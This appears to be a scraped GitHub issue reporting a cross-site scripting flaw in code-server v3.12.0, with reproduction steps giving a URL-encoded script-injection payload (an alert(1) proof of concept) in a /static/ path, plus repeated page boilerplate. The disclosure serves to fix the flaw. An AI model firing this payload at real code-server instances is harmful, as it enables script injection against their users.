Cross Site Scripting（XSS）vulnerability in code-server

## OS/Web Information

- Web Browser: **firefox**
- Local OS: **Debian**
- Remote OS:**Debian**
- Remote Architecture:
- `code-server --version`: **v3.12.0**

## Steps to Reproduce

1.Open your browser and insert payload `/static/test%3Cmy_tag_efb4535077ba29aaca28167c491b4249/%3E%3Cimg%20src=x%3E%3Cscript%3Ealert(1)%3C/script%3E`

2.example: `http://127.0.0.1:8080/static/test%3Cmy_tag_efb4535077ba29aaca28167c491b4249/%3E%3Cimg%20src=x%3E%3Cscript%3Ealert(1)%3C/script%3E`





## Screenshot
![image](https://user-images.githubusercontent.com/17903984/137276639-c78d62b4-a91c-467f-a676-50a8abb65fad.png)


## Notes



This issue can be reproduced in VS Code: Yes

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Cross Site Scripting（XSS）vulnerability in code-server #4355

OS/Web Information

Steps to Reproduce

Screenshot

Notes

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Cross Site Scripting（XSS）vulnerability in code-server #4355

Description

OS/Web Information

Steps to Reproduce

Screenshot

Notes

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions